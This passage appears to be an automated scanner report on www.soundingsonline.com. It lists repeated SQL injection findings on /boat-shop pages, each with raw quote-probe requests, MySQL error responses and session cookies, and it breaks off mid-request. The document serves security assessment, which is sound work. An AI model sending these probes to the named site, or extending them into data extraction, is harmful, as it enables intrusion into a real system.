The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /archives?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /archives?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.46. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.47. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/know-how

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/know-how?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/know-how?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.48. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-boats

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/new-boats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/new-boats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.49. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-gear

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/new-gear?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/new-gear?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.50. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-powerboats

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/on-powerboats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/on-powerboats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.51. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-sailboats

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/on-sailboats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/on-sailboats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.52. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/q-a-a

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/q-a-a?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/q-a-a?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.53. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/sea-savvy

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/sea-savvy?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/sea-savvy?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.54. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/tech-talk

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/tech-talk?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
